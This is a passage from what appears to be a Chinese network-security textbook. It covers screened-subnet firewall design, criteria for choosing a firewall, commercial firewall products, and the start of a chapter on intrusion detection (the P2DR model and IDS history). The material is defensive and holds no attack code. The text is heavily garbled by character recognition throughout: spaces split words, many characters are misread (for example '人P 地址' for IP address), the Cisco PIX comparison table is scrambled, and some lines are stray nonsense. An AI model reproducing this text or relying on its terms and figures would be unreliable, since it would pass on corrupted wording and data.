由 器 ， 每 一 个 都 连接 到 周边 网 络 。 一 个 位 于 周边 网 络 与 内 部 的 网 络 之 间 ， 另 一 个 位 于 周边 
网 络 与 外 部 网 络 之 间 ( 通 常 为 Internet)。 为 了 侵入 用 这 种 类 型 的 体系 结构 构筑 的 内 部 网 络 ， 
侵袭 者 必须 要 通过 两 个 路 由 器 。 即 使 侵袭 者 设法 侵入 堡垒 主机 ， 他 将 仍然 必须 通过 内 部 路 
由 器 。 在 此 情况 下 ， 没 有 损害 内 部 网 络 的 单一 的 易 受 侵 椅 点 。 作 为 入 侵 者， 他 只 是 进行 了 
-次 访问 。 

1. 周边 网 络 


周边 网 络 是 另 一 个 安全 层 ， 是 在 外 部 网 络 与 用 户 的 被 保护 的 内 部 网 络 之 间 的 附加 的 网 
络 。 如 果 侵 效 者 成 功 地 侵入 用 户 的 防火 墙 的 外 层 领 域 ， 周 边 网 络 在 侵袭 者 与 用 户 的 内 部 系 
统 之 间 提供 一 个 附加 的 保护 层 。 

在 许多 网 络 结构 中 ， 用 给 定 网 络 上 的 任何 计算 机 来 查看 这 个 网 络 上 的 每 一 台 计算 机 的 
通信 和 是 可 能 的 ， 如 以 太 网 、 令 牌 环 和 FDDI。 探 听 者 可 以 监听 Telnet、FTP 以 及 rlogin 会 话 
期 间 使 用 过 的 口令 ， 偷 看 敏感 信息 等 。 探 听 者 能 完全 监视 何人 在 使 用 网 络 。 

对 于 周边 网 络 ， 如 果 攻 击 者 侵入 周边 网 络 上 的 堡 侄 主机， 他 也 仅 能 探听 到 周边 网 上 的 
通信 ， 内 部 网 络 的 通信 仍 是 安全 的 。 

2. 堡垒 主机 

在 屏蔽 的 子 网 体系 结构 中 ， 用 户 把 堡 侄 主机 连接 到 周边 网 。 这 台 主 机 便 是 接受 来 自 外 
界 连接 的 主要 入 口 。 例 如 : 对 于 进来 的 电子 邮件 (SMTP) 会 话 ， 传 送 电 子 邮 件 到 站 点 ， 对 于 
进来 的 FTP 连接, 转 接 到 站 点 的 匿名 FTP 服务 器 ; 对 于 进来 的 域名 服务 (DNS) 站 点 查询 等 。 

从 内 部 的 客户 端 到 在 Internet 上 的 服务 器 的 出 站 服务 按 如 下 任 一 方法 处 理 :在 外 部 和 内 
部 的 路 由 器 上 设置 数据 包 过 滤 来 允许 内 部 的 客户 端 直接 访问 外 部 的 服务 器 ， 设 置 代理 服务 
器 在 堡垒 主机 上 运行 来 允许 内 部 的 客户 端 间接 地 访问 外 部 的 服务 器 。 用 户 也 可 以 设置 数据 
包 过 滤 来 允许 内 部 的 客户 端 在 堡垒 主机 上 同 代理 服务 器 通信 ， 反 之 亦 然 。 但 是 禁止 内 部 的 
客户 端 与 外 部 世界 之 问 直接 通信 ( 即 拨号 入 网 方式 )。 

3. 内 部 路 由 器 


内 部 路 由 器 有 时 被 称 为 阻塞 路 由 器 ， 它 保护 内 部 的 网 络 使 之 免 受 Intemet 和 周边 网 的 
侵犯 。 

内 部 路 由 器 为 用 户 的 防火 墙 执行 大 部 分 的 数据 包 过 滤 工 作 。 它 允许 从 内 部 网 到 Internet 
的 有 选择 的 出 站 服务 。 

内 部 路 由 器 所 允许 的 在 堡垒 主机 和 用 户 的 内 部 网 之 间 的 服务 可 以 不 同 于 内 部 路 由 器 所 
允许 的 在 Intemet 和 用 户 的 内 部 网 之 间 的 服务 。 限 制 堡垒 主机 和 内 部 网 之 间 服 务 的 理由 是 减 
少 了 堡垒 主机 被 攻破 时 对 内 部 网 的 危害 。 
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4. 外 部 路 由 器 


外 部 路 由 器 有 时 被 称 为 访问 路 由 器 ， 保 护 周 边 网 和 内 部 网 使 之 免 受 来 自 Internet 的 侵 
犯 。 实 际 上 ， 外 部 路 由 器 允许 几乎 任何 东西 从 周边 网 出 站 ， 并 且 它 们 通常 只 执行 非常 少 的 
数据 包 过 滤 。 保 护 内 部 计算 机 的 数据 包 过 滤 规 则 在 内 部 路 由 器 和 外 部 路 由 器 上 基本 上 是 一 
样 的 。 如 果 在 规则 中 有 人 允许 侵袭 者 访问 的 错误 ， 错 误 就 可 能 出 现在 两 个 路 由 器 上 。 

- 般 ， 外 部 路 由 器 由 外 部 群 组 提供 (例如 用 户 的 Intemet 供应 商 )， 同 时 用 户 对 它 的 访问 
被 限制 。 外 部 群 组 可 能 愿意 放 入 一 些 通用 型 数据 包 过 滤 规 则 来 维护 路 由 器 ， 但 是 不 愿意 使 
用 维护 复杂 或 者 频繁 变化 的 规则 组 。 

外 部 路 由 器 能 有 效 地 执行 的 安全 任务 之 一 是 阻止 从 Intemet 上 伪造 源 地 址 进来 的 任何 
数据 包 。 这 样 的 数据 包 自 称 来 自 内 部 的 网 络 ， 但 实际 上 是 来 自 nternet。 


5.3.4 防火墙 的 组 合 结构 


建造 防火 增 时 ， 一 般 很 少 采用 单一 的 技术 ， 通 常 是 多 种 解决 不 同 问题 的 技术 的 组 合 。 
这 种 组 合 主要 取决 于 网 管 中 心 向 用 户 提供 什么 样 的 服务 ， 以 及 网 管 中 心 能 接受 什么 等 级 的 
风险 。 采 用 哪 种 技术 主要 取决 于 经 费 ， 投 资 的 大 小 或 技术 人 员 的 技术 、 时 间 等 因素 。 一 般 
有 以 下 几 种 形式 。 

。 ”使 用 多 堡垒 主机 。 
合并 内 部 路 由 器 与 外 部 路 由 器 。 
合并 堡 公主 机 与 外 部 路 由 器 。 
合并 保 双 主机 与 内 部 路 由 器 。 
使 用 多 台 内 部 路 由 器 。 
使 用 多 台 外 部 路 由 器 。 
使 用 多 个 周边 网 络 。 

。 ”使 用 双重 宿主 主机 与 屏蔽 子 网 。 

通常 建立 防火 墙 的 目的 在 于 保护 内 部 网 免 受 外 部 网 的 侵扰 ， 但 内 部 网 络 中 每 个 用 户 所 
需要 的 服务 和 信息 经 常 是 不 一 样 的， 它们 对 安全 保障 的 要 求 也 不 一 样 。 例 如 ， 财 务 部 门 与 
其 他 部 门 分 开 ， 人 事 档 案 部 门 与 办 公 管 理 部 门 分 开 等 。 我 们 还 需要 对 内 部 网 的 部 分 站 点 再 
加 以 保护 以 免 受 内 部 的 其 他 站 点 的 侵袭 ， 既 在 同一 结构 的 两 个 部 分 之 问 ， 或 者 在 同一 内 部 
网 的 两 个 不 同 组 织 结构 之 间 再 建立 防火 增 ， 也 就 是 内 部 防火 增 。 许 多 用 于 建立 外 部 防火 增 
的 工具 与 技术 也 可 用 于 建立 内 部 防火 墙 。 


5.4 ”如 何 选择 防火 墙 


防火 墙 现今 已 经 是 网 络 建设 中 必 备 的 一 个 安全 产品 , 作为 保障 网 络 安全 的 第 一 道 防线 ， 
自然 成 为 网 络 用 户 尤其 是 企业 用 户 的 热门 选 购 对 象 ， 面 对 林林总总 的 防火 墙 产品 ， 如 何 用 
最 低 的 成 本 获得 最 大 效益 ， 找 到 性 价 比 最 高 的 产品 组 合 ， 成 为 摆 在 企业 网 络 安全 建设 人 员 
面前 的 一 道 难 题 。 
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5.4.1 选择 防火 墙 的 基本 原则 
1. 硬件 防火 墙 选 购 


硬件 防火 墙 价格 从 几 千 元 到 几 十 万 元 不 等 ， 部 署 位 置 从 服务 器 、 网 关 到 客户 端 ， 所 面 
对 的 企业 应 用 环境 千差万别。 选择 防火 墙 产品 ， 要 遵循 下 面 几 个 基本 原则 。 

1) ”大 企业 根据 部 署 位 置 选 择 防火 墙 

大 型 企业 应 该 选择 一 套 可 管理 的 防火 墙 体 系 ， 将 防火 墙 分 别 部 署 到 网 络 的 服务 器 、 网 
关 和 客户 端 上 ， 每 一 个 位 置 对 防火 墙 的 性 能 指标 要 求 都 不 一 样 。 在 服务 器 端 部 署 防火 墙 ， 
可 限定 内 网 的 随意 访问 ， 防 止 来 自 内 部 的 攻击 。 由 于 经 常 有 大 量 的 访问 ， 对 防火 墙 的 安全 
性 和 性 能 提出 了 较 高 的 要 求 。 在 网 关 级 ， 防 火 墙 往往 成 为 整个 网 络 的 效率 瓶颈 ， 如 果 选 择 
不 好 ， 有 可 能 影响 整个 网 络 的 效率 ， 因 此 ， 必 须 选 择 一 款 并 发 连接 数 高 的 高 性 能 防火 墙 。 
在 客户 端 ， 则 最 好 选择 可 被 管理 的 防火 增 ， 可 由 防火 墙 管理 系统 进行 统一 管理 。 

2) “中 小 企业 根据 网 络 规模 选择 防火 墙 

中 小 企业 一 般 在 网 关 级 配置 防火 墙 ， 可 选择 百 兆 或 千 兆 的 性 能 。 有 具体 可 根据 自身 应 用 
的 规模 和 数据 流量 来 定 ， 避免 出 现 性 能 不 足 的 情况 ， 比 如 在 数据 流量 大 时 选择 了 百 兆 性 能 
使 防火 墙 成 为 网 络 性 能 的 瓶颈 。 也 要 避免 性 能 过 剩 现 象 ， 比 如 在 百 兆 的 线路 上 安装 千 光 防 
火 增 ， 造 成 浪费 。 

3) ”考查 厂商 实力 和 服务 

防火 墙 领域 市 场 竞争 激烈 ， 对 用 户 而 言 ， 厂 商 的 长 久 服 务 非常 重要 ， 因 为 黑客 技术 在 
不 断 发 展 ,防火 墙 技术 和 软件 需要 随时 升级 ， 所 以 ,实力 雄厚 的 厂商 的 产品 应 该 作为 首选 。 

防火 堵 对 许多 中 小 企业 来 说 ， 是 一 种 新 兴 的 、 陌 生 的 设备 ， 在 购买 之 前 和 之 后 ， 都 需 
要 厂商 的 培训 和 服务 支持 ， 尤 其 是 售后 的 培训 和 升级 服务 非常 关键 。 

4) “考查 产品 认证 

目前 国家 对 防火 墙 的 认证 有 许多 种 , 通过 了 某 种 认证 意味 着 该 产品 通过 了 相应 的 检测 。 
目前 有 3 种 认证 : 中 国信 息 安全 产品 测评 认证 中 心 的 认证 (针对 企业 应 用 )、 国 家 保密 局 测 
评 认证 中 心 的 认证 (针对 政府 涉 密 网 应 用 ) 以 及 军队 的 测评 认证 (针对 军队 使 用 )。 

5) 选择 中 立 的 咨询 公司 

大 型 企业 在 选择 防火 墙 之 前 ， 最 好 选择 第 三 方 咨询 机 构 ， 将 其 整体 的 安全 需求 进行 评 
估 ， 将 防火 墙 作为 公司 安全 战略 的 一 个 部 分 加 以 考虑 ， 合 防火墙 纳入 公司 总 体 信息 安全 体 
系 当中 。 

2. 个 人 防火 墙 选 购 

个 人 防火 墙 在 实现 基本 的 访问 控制 、 端 口 屏 蔽 方面 大 同 小 异 , 选择 的 关键 在 于 稳定 性 、 
资源 占用 率 、 易 用 性 和 厂商 的 技术 支持 能 力 。 

个 人 电脑 上 安装 了 很 多 应 用 软件 ， 彼 此 冲突 的 可 能 性 也 就 比较 大 ， 防 火 墙 是 始终 在 后 
台 运行 的 ， 所 以 良好 的 稳定 性 和 健壮 性 至 关 重要 ， 是 挑选 个 人 防火 墙 的 首要 参数 。 在 实现 
同样 功能 的 前 提 下 个 人 防火 墙 软件 消耗 的 资源 应 尽 可 能 的 小 ,同时 要 界面 友好 、 易 于 使 用 ， 
特别 是 对 于 普通 用 户 。 而 所 谓 技术 支持 是 指 厂商 是 否 持续 地 投入 研发 力量 ,产品 不 断 更 新 ， 


TTT EEC 
并 且 能 方便 地 通过 互联 网 进行 升级 。 
5.4.2 选择 防火 墙 的 注意 事项 
防火 墙 的 选择 应 该 注意 以 下 几 点 。 
1. 防火 墙 自身 是 否 安全 


防火 墙 是 否 基于 安全 (甚至 是 专用 ) 的 操作 系统 。 
防火 墙 是 否 采用 专用 的 硬件 平台 。 


2. 系统 是 否 稳定 


防火 墙 的 稳定 性 情况 可 从 以 下 材料 中 看 出 来 。 

。 国家 权威 的 测评 认证 机 构 ， 如 公安 部 计算 机 安全 产品 检测 中 心 和 中 国 国家 信息 安 
全 测评 认证 中 心 。 

e ”与 其 他 产品 相 比 ， 是 否 获得 更 多 的 国家 权威 机 构 的 认证 、 推 荐 和 入 网 证 明 ( 书 )。 

3. 是 否 高 效 、 可 靠 


高 性 能 是 防火 墙 的 一 个 重要 指标 ， 它 直接 体现 了 防火 墙 的 可 用 性 ， 也 体现 了 用 户 使 用 
防火 墙 所 需 付出 的 安全 代价 如 果 由 于 使 用 防火 堵 而 带 来 了 网 络 性 能 较 大 幅度 地 下 降 的 话 ， 
就 意味 着 安全 代价 过 高 ， 用 户 是 无 法 接受 的 。 一 般 来 说 ， 防 火 墙 加 载 上 百 条 规则 ， 其 性 能 
F 降 不 应 超过 5%( 指 包 过 滤 防 火 墙 )。 支 持 多 少 个 连接 也 可 以 计算 出 一 个 指标 ， 虽 然 这 并 不 
能 完全 定义 或 控制 。 

可 靠 性 对 防火 墙 闫 访问 控制 设备 来 说 万 为 重要 ， 其 直接 影响 受 控 网 络 的 可 用 性 。 从 系 
统 设计 上 ， 提 高 可 靠 性 的 措施 一 般 是 提高 本 身 部 件 的 强健 性 、 增 大 设计 阅 值 和 增加 宛 余部 
件 ， 这 要 求 有 较 高 的 生产 标准 和 设计 宛 余 度 ， 如 使 用 工业 标准 、 电 源 热 备份 、 系 统 热 备 
份 等 

4. 功能 是 否 灵活 

对 通信 行为 的 有 效 控制 ， 要 求 具有 不 同 级 别 的 防火 墙 设备 、 满 足 不 同 用 户 的 各 类 安全 
控制 需求 的 控制 注意 。 控 制 注意 的 有 效 性 、 多 样 性 ， 级 别 目标 的 清晰 性 ， 制 定 的 难 易 性 和 
经 济 性 等 ， 体 现 着 控制 注意 的 高 效 和 质量 。 

5. 配置 、 管 理 是 否 简便 

目前 市 场 上 支持 透明 方式 的 防火 墙 较 多 ， 在 选 购 时 需要 仔细 鉴别 。 大 多 数 防火 堵 只 能 
工作 于 透明 模式 或 网 关 模 式 ， 只 有 极 少数 防火 增 可 以 工作 于 混合 模式 ， 即 可 以 同时 作为 网 
关 和 网 桥 ， 工 作 于 混合 模式 的 防火 墙 在 使 用 时 显然 具有 更 大 的 方便 性 。 

对 于 防火 墙 类 访问 控制 设备 ， 除 安全 控制 注意 的 不 断 调整 外 ， 业 务 系统 访问 控制 的 调 
整 也 很 频繁 ， 这 些 都 要 求 防火 墙 的 管理 在 充分 考虑 安全 需要 的 前 提 下 ， 必 须 提供 方便 灵活 
的 管理 方式 和 方法 ， 这 通常 体现 为 管理 途径 、 管 理工 具 和 管理 权限 。 
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6. 是 否 可 以 抵抗 拒绝 服务 攻击 


在 当前 的 网 络 攻击 中 ， 拒 绝 服务 攻击 是 使 用 频率 最 高 的 方法 ， 拒 绝 服务 攻击 可 以 分 为 
两 类 。 一 类 是 由 于 操作 系统 或 应 用 软件 本 身 设计 或 编程 上 的 缺陷 而 造成 的 ， 由 此 带 来 的 攻 
击 种 类 很 多 , 只 有 通过 打 补丁 的 办 法 来 解决 ; 另 一 类 是 由 于 TCP/IP 协议 本 身 的 缺陷 造成 的 ， 
只 有 有 数 的 几 种 ， 但 危害 性 非常 大 ， 如 Synflooding 等 。 

因此 在 采购 防火 墙 时 ， 网 管 人 员 应 该 详细 考察 这 一 功能 的 真实 性 和 有 效 性 。 

7. 是 否 可 以 针对 用 户 身份 进行 过 滤 

防火 墙 过 滤 报 文 时 ， 最 基础 的 是 针对 人 P 地 址 进行 过 滤 。 大 家 都 知道 ， 卫 地 址 是 非常 
容易 修改 的 ， 只 要 打听 到 内 部 网 里 谁 可 以 穿 过 防火 墙 ， 那 么 将 自己 的 人 P 地 址 改 成 和 他 的 

- 样 就 可 以 了 。 这 就 需要 一 个 针对 用 户 身份 而 不 是 人 P 地 址 进行 过 滤 的 办 法 。 目 前 防火 墙 上 
常用 的 是 一 次 性 口令 验证 机 制 ， 通 过 特殊 的 算法 ， 保 证 用 户 在 登录 防火 墙 时 ， 口 令 不 会 在 
网 络 上 泄露 ， 这 样 防火 墙 就 可 以 确认 登录 上 来 的 用 户 确实 和 他 所 声称 的 一 致 。 

8. 是 否 具有 可 扩展 、 可 升级 性 


和 防 病毒 产品 类 似 ， 随 着 网 络 技术 的 发 展 和 黑客 攻击 手段 的 变化 ， 防 火 墙 也 必须 不 断 
地 进行 升级 ， 此 时 支持 软件 升级 就 很 重要 了 。 如 果 不 支持 ， 软 件 升 级 的 话 ， 为 了 抵御 新 的 
攻击 手段 ， 用 户 就 必须 进行 硬件 上 的 更 换 ， 而 在 更 换 期 间 ， 网 络 是 不 设防 的 ， 同 时 要 为 此 
花费 更 多 的 钱 。 


5.4.3 常用 防火 墙 产品 介绍 

目前 在 中 国 市 场 上 防火 墙 产品 品牌 繁多 ， 主 要 分 国外 品牌 与 国内 本 土产 品 两 大 类 ， 可 
以 说 各 有 各 的 特色 。 国 外 的 如 Cisco、Juniper(Netscreen)、Checkpoint、Fortigate， 国 内 的 有 
天 融 信 (TOPSEC)、 华 为 (H3C)、 华 三 ， 其 他 还 有 联想 (现在 已 经 变 成 OEM fortigate)、 网 御 
神州 (原来 的 联想 )、 安 氏 、 东 软 、 启 明星 辰 等 。 

1. 美国 品牌 NetScreen 防火 墙 

NetScreen 防火 墙 是 一 种 由 硬件 来 实现 防火 墙 技术 的 网 络 安全 产品 。 它 将 网 络 地 址 翻 
译 、 防 火 墙 技术 、DMZ( 非 军事 地 带 )、VPN( 虚 拟 专用 网 ) 性 能 、 负 和 载 平衡 及 流量 控制 技术 集 
成 在 同一 设备 里 ， 具 有 速度 快 、 功 能 完善 、 设 置 简单 和 高 性 能 价格 比 的 优点 。 在 企业 内 部 
网 (Intranet) 的 部 门 、 连 接 跨 Internet 的 分 支 机构 和 连接 Internet 网 的 企业 ， 它 都 是 最 佳 的 选 
择 。 主 要 产品 有 NetScreen-5000 系列 (高 端 应 用 ) NetScreen-208( 中 端 应 用 )、 NetScreen-50( 中 
低 端 应 用 ) 等 。 

2. Cisco PIX 防火 墙 

PIX 是 Cisco 公司 开发 的 防火 墙 系列 产品 ， 主 要 起 策略 过 滤 、 隔 离 内 外 网 、 根 据 用 户 实 
际 需 求 设置 DMZ( 停 火 区 ) 的 作用 。 它 和 一 般 硬件 防火 墙 一 样 具 有 转发 数据 包 速 度 快 ， 可 设 
定 的 规则 种 类 多 ， 配 置 灵活 的 特点 。 不 同 版 本 的 PIX 可 以 提供 不 同 的 防护 配置 方案 。 主 要 
的 产品 如 表 5-1 所 示 。 


J 禹 5 萌 历 色 如 及 大 


表 5-1 Cisco PIX 防火 墙 主 要 产品 一 览 表 


PIX a 
PIX FWSM 高 端 
产品 型 号 PIX 501 BE 535-UR, 防火墙 模 据 
支持 千 兆 
市 声 小 型 办 公 室 | 远程 办 | 中 小 型 分 ; 大 型 企业 + | 大 型 企业 + 
家 庭 办 公 室 服务 供应 商 | 服务 供应 商 
许可 用 户 个 数 | 10 或 者 50 无 限 无 限 无 限 
最 大 接口 数 | 1 个 10BT+4 |2 个 4 ge 
(物理 + 逻辑 ) 个 FE 10BaseT 
2 个 10BaseT | 2 个 2 个 
aSe 
物理 接口 个 数 ”| lonoor4 10/100+6 10/100+8 个 | 4096 
4 端口 交换 机 | 10BaseT 
个 10/100 个 FE/GE FE/GE 
最 大 连接 数 7500 25000 130000 380000 500000 1000000 
支持 基于 Web 
是 是 是 
的 管理 方式 
否 
是 否 支持 简单 是 是 是 
VPN 


3. 天 融 信 NGFWARES 防火 墙 


网 络 卫 士 NGFWARES 系列 防火 墙 产 品 ,， 是 天 融 信 公司 为 行业 分 支 机构 、 中 小 型 企业 、 
教育 行业 非 骨干 节点 院 校 、 单 位 内 部 的 部 门 级 等 中 小 用 户 开发 的 高 性 价 比 的 安全 平台 
络 卫士 NGFWARES 系列 防火 墙 产品 既 提 供 1U 机 架 式 的 产品 ， 也 提供 小 巧 的 桌面 型 产品 。 
具有 灵活 的 配置 向 导 和 一 键 恢 复 功能 。 主 要 产品 有 NGFW3000-T3 、NGFW2000-T3 、 
NGFW4000-UB-T3、NGFW3000-T4 等 。 


4. 华为 3Com Quidway 防火 墙 


Quidway 是 华为 3Com 公司 面向 SOHO、 分 支 机 构 用 户 开 发 的 新 一 代 专业 接 
入 防火 墙 设备 。 它 具有 支持 外 部 攻击 防范 、 内 网 安全 、 流 量 监控 等 功能 ， 能 够 有 效 地 保证 
网 络 的 安全 ;采用 ASPF 状态 检测 技术 ， eve 命令 进行 检测 ;支持 AAA、 
NAT 等 技术 ， 可 以 确保 在 开放 的 Internet 上 实现 安全 的 、 满 足 可 靠 质量 要 求 的 网 络 ， 支 持 
多 种 VPN 业务 ,如 L2TP VPN、IPSec VPN、GRE VPN、 华 为 动态 VPN 等 , 可 以 构建 Internet、 
Intranet、Remote Access 等 多 种 形式 的 VPN。 主 要 产品 有 SecPath F100-S-AC( 中 小 企业 )、 
SecPath F100-M-AC( 大 中 型 企业 )、SecPath F1000-A-AC( 大 中 型 企业 级 VPN 网 关 ) 等 。 


第 6 章 入 侵 检测 系统 


@ 基本 的 入 侵 检 测 知识 
。 ”入侵 检测 的 基本 原理 和 重要 技术 
e。 几 种 流行 的 入 侵 检测 产品 


6.1 入 侵 检测 概述 


当 越 来 越 多 的 公司 将 其 核心 业务 向 互联 网 转移 的 时 候 ， 网 络 安全 作为 一 个 无 法 回避 的 
问题 呈现 在 人 们 面前 。 传 统 上 ， 公 司 一 般 采 用 防火 墙 作为 安全 的 第 一 道 防线 。 但 是 ， 防 火 
墙 只 是 一 种 被 动 防御 性 的 网 络 安全 工具 ， 仅 仅 使 用 防火 墙 是 不 够 的 。 首 先 ， 入 侵 者 可 以 找 
到 防火 墙 的 漏洞 ， 绕 过 防火 墙 进行 攻击 。 其 次 ， 防 火 墙 对 来 自 内 部 的 攻击 无 能 为 力 。 它 所 
提供 的 服务 方式 是 要 么 都 拒绝 ， 要 么 都 通过 ， 不 能 检查 出 经 过 它 的 合法 流量 中 是 否 包含 着 
恶意 的 入 侵 代码 ， 这 是 远 远 不 能 满足 用 户 复杂 的 应 用 要 求 的 。 

对 于 以 上 提 到 的 问题 ， 一 个 更 为 有 效 的 解决 途径 就 是 入 侵 检 测 技术 (IDS)。 在 入 侵 检 测 
技术 之 前 ， 大 量 的 安全 机 制 都 是 从 主观 的 角度 设计 的 ， 他 们 没有 根据 网 络 攻击 的 具体 行为 
来 决定 安全 对 策 ， 因 此 ， 它 们 对 入 侵 行 为 的 反应 非常 迟钝 ， 很 难 发 现 未 知 的 攻击 行为 ， 不 
能 根据 网 络 行为 的 变化 来 及 时 地 调整 系统 的 安全 策略 。 而 入 侵 检 测 技术 正 是 根据 网 络 攻击 
行为 而 进行 设计 的 ， 它 不 仅 能 够 发 现 已 知 入 侵 行为 ， 而 且 有 能 力 发 现 未 知 的 入 侵 行为 ， 并 
可 以 通过 学 习 和 分 析 入 侵 手 段 ， 及 时 地 调整 系统 策略 以 加 强 系统 的 安全 性 。 


6.1.1 入 侵 检测 概念 
1. 入 侵 检测 与 P2DR 模型 


由 于 系统 的 日 趋 频繁 ， 安 全 的 概念 已 经 不 仅仅 局 限于 信息 的 保护 ， 人 们 需要 的 是 对 整 
个 信息 和 网 络 系统 的 保护 和 防御 ， 即 从 以 前 的 被 动 保护 转 到 了 现在 的 主动 防御 ， 强 调整 个 
生命 周期 的 防御 和 恢复 。PDR 模型 是 最 早 提出 的 体现 这 样 一 种 思想 的 安全 模型 。20 世纪 
90 年 代 末 ， 又 提出 了 P2DR 模型 并 一 直 使 用 至 今 。 这 里 P2DR 是 Policy( 安 全 策略 )、 
Protection( 防 护 )、Detection( 检 测 )、Response( 啊 应 ) 的 缩写 。 其 体系 框架 如 图 6-1 所 示 。 

其 中 各 部 分 的 含义 如 下 。 

1) ”安全 策略 (Policy) 

根据 风险 分 析 产 生 的 安全 策略 描述 了 该 系统 中 哪些 资源 要 得 到 保护 ， 以 及 如 何 实现 对 
它们 的 保护 等 。 

2) ”防护 (Protection) 

采用 可 能 采取 的 手段 保障 信息 的 保密 性 、 完 整 性 、 可 用 性 、 可 控 性 和 不 可 否认 性 。 


图 6-1 P2DR 模型 的 体系 框架 


3) ”检测 (Detection) 

通过 不 断 地 检测 和 监控 网 络 及 系统 ， 来 发 现 新 的 威胁 和 弱点 ， 通 过 反馈 来 及 时 做 出 有 
效 的 响应 。 

4) ”响应 (Response) 

对 危及 安全 的 事件 、 行 为 、 过 程 及 时 做 出 响应 处 理 ， 杜 绝 危 害 的 进一步 草 延 扩大 ， 力 
求 系统 能 提供 正常 服务 。 

目前 ， 入 侵 检测 技术 是 实施 检测 功能 的 最 有 效 的 技术 。 形 象 地 说 入 侵 检测 系统 是 网 络 
摄像 机 ， 能 够 捕获 并 记录 网 络 上 的 所 有 数据 ， 同 时 它 也 是 智能 摄像 机 ， 能 够 分 析 网 络 数据 
并 提炼 出 可 疑 的 、 异 常 的 网 络 数 据 ， 它 还 是 义 光 摄 像 机 ， 能 够 穿 透 一 些 巧 妙 的 伪装 ， 抓 住 
实际 的 内 容 ， 它 亦 是 保安 员 的 摄像 机 ， 能 够 对 入 侵 行为 自动 地 进行 反击 ， 如 阻 断 连接 。 

2. 入 侵 检测 的 作用 

随 着 网 络 的 普及 ， 网 络 安全 事件 的 发 生 离 我 们 越 来 越 近 ， 我 们 可 能 遇 到 如 下 情况 。 

e ”公司 的 网 络 系统 被 入 侵 了 ， 造 成 服务 器 瘫痪 ， 但 不 知道 什么 时 候 被 入 侵 的 。 

e ”客户 抱怨 公司 的 网 页 无 法 正常 打开 ,检查 发 现 是 服务 器 被 攻击 了 ， 但 不 知道 遭受 

何 种 方式 的 攻击 。 

e 公司 机 密 资 料 被 窃 ， 给 公司 造成 巨大 的 损失 ， 但 是 检查 不 出 是 谁 干 的 。 

e ”公司 网 络 被 入 侵 了 ， 安 全 事件 调查 中 缺乏 证 据 。 

根据 调查 数据 显示 ， 以 上 情况 给 网 络 管理 员 带 来 极 大 的 困扰 ， 也 给 企业 带 来 了 巨大 的 
安全 风险 。 如 何 及 时 地 、 准 确 地 发 现 违反 安全 策略 的 事件 ， 并 及 时 处 理 ， 是 广大 用 户 迫 切 
需要 解决 的 问题 。 

入 侵 检测 技术 是 通过 对 计算 机 网 络 和 主机 系统 中 的 关键 信息 进行 实时 采集 和 分 析 ， 从 
而 判断 出 非法 用 户 入 侵 和 合法 用 户 滥用 资源 的 行为 ， 并 做 出 适当 反应 的 网 络 安全 技术 。 它 
在 传统 的 网 络 安全 技术 的 基础 上 ， 实 现 了 检测 与 反应 ， 起 主动 防御 的 作用 。 这 使 得 对 网 络 
安全 事故 的 处 理 ， 由 原来 的 事后 发 现 发 展 到 了 事前 报警 、 自 动 响应 ， 并 可 以 为 追究 入 侵 者 
的 法 律 责任 提供 有 效 证 据 。 因 此 ， 入 侵 检测 技术 的 出 现 ， 使 网 络 安全 领域 的 研究 进入 了 一 
个 新 的 阶段 。 


(99> 网络 安全 管理 与 维护 


潼 汀 车 拆 半 ”全 涟 开 侣 村 才 到 招 到 


3. 入 侵 检 测 的 概念 


入 侵 主要 是 指 对 系统 资源 的 非 授权 使 用 ， 它 可 以 造成 系统 数据 的 丢失 和 破坏 ， 造 成 系 
统 拒绝 对 合法 用 户 服务 等 危害 。 

入 侵 检测 是 指 “通过 对 行为 、 安 全 日 志 或 审计 数据 或 其 他 网 络 上 可 以 获得 的 信息 进行 
操作 ， 检 测 到 对 系统 的 间 入 或 间 入 的 企图 ”( 参 见 国标 GB/T18336)。 

入 侵 检测 是 对 传统 安全 产品 的 合理 补充 ， 帮 助 系统 对 付 网 络 攻击 ， 扩 展 了 系统 管理 员 
的 安全 管理 能 力 (包括 安全 审计 、 监 视 、 进 攻 识 别 和 响应 )， 提 高 了 信息 安全 基础 结构 的 完 
整 性 。 入 侵 检测 主要 监视 发 生 在 计算 机 系统 或 网 络 中 的 事件 ， 分 析 隐 藏 的 安全 问题 ， 监 视 、 
检测 计算 机 系统 和 网 络 中 的 目标 活动 并 作出 响应 的 功能 。 

我 们 做 一 个 形象 的 比喻 ， 假 如 防火 墙 是 一 幢 大 楼 的 门卫 ， 那 么 IDS 就 是 这 幢 大 楼 里 的 
监视 系统 。 一 旦 小 偷 聆 窗 进 入 大 楼 ， 或 内 部 人 员 有 越界 行为 ， 只 有 实时 监视 系统 才能 发 现 
情况 并 发 出 和 警告。 入 侵 检测 系统 的 作用 如 图 6-2 所 示 。 


防 
外 部 访问 火 
墙 


扫描 系统 


实时 监测 系统 定时 扫描 系统 


图 6-2 入 侵 检 测 系统 的 作用 

4. 入 侵 检 测 系统 的 发 展 历史 

下 面 简单 介绍 一 下 入 侵 检 测 技术 的 发 展 历史 及 研究 现状 。 

1980 年 4 月 ，James Anderson 为 美国 空军 作 了 一 份 题 为 Computer Security Threat 
Monitoring and Surveillance( 计 算 机 安全 威胁 监控 与 监视 ) 的 技术 报告 ， 这 份 报告 被 公认 为 入 
侵 检测 技术 的 开山 鼻祖 。 他 在 文中 第 一 次 引入 了 入 侵 检测 的 概念 ， 并 提出 了 一 种 对 计算 机 
系统 风险 和 威胁 的 分 类 方法 。 他 将 威胁 分 为 外 部 渗透 、 内 部 渗透 和 不 法 行为 三 种 。 同 时 ， 
还 提出 了 利用 系统 的 审计 记录 检查 入 侵 企图 的 方法 。 这 篇 文章 提出 在 审计 记录 中 包含 着 许 
多 关键 信息 ， 这 些 信 息 对 跟踪 误 用 行为 和 理解 用 户 行为 有 很 大 的 帮助 。 从 此 ， 审 计数 据 的 
重要 性 被 广泛 接受 ， 进 而 操作 系统 的 审计 子 系统 也 发 生 了 很 大 的 改善 。 但 是 ， 审 计 跟 踪 并 
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不 能 发 现 “ 伪 装 者 ” 即 用 户 的 口令 和 账户 一 旦 被 次 用 ,审计 就 没有 任何 办 法 。 因 此 , Anderson 
提出 可 以 根据 用 户 行为 的 统计 分 析 来 判断 系统 是 否 出 于 正常 模式 。 不 久 ， 这 个 想法 被 
Denning 完成 的 另 一 个 里 程 碑 式 的 贡献 IDES 系统 实现 了 。 

1987 年 ， 乔 治 敦 大 学 的 Dorothy Denning 提出 了 第 一 个 实时 入 侵 检测 系统 模型 ， 取 名 
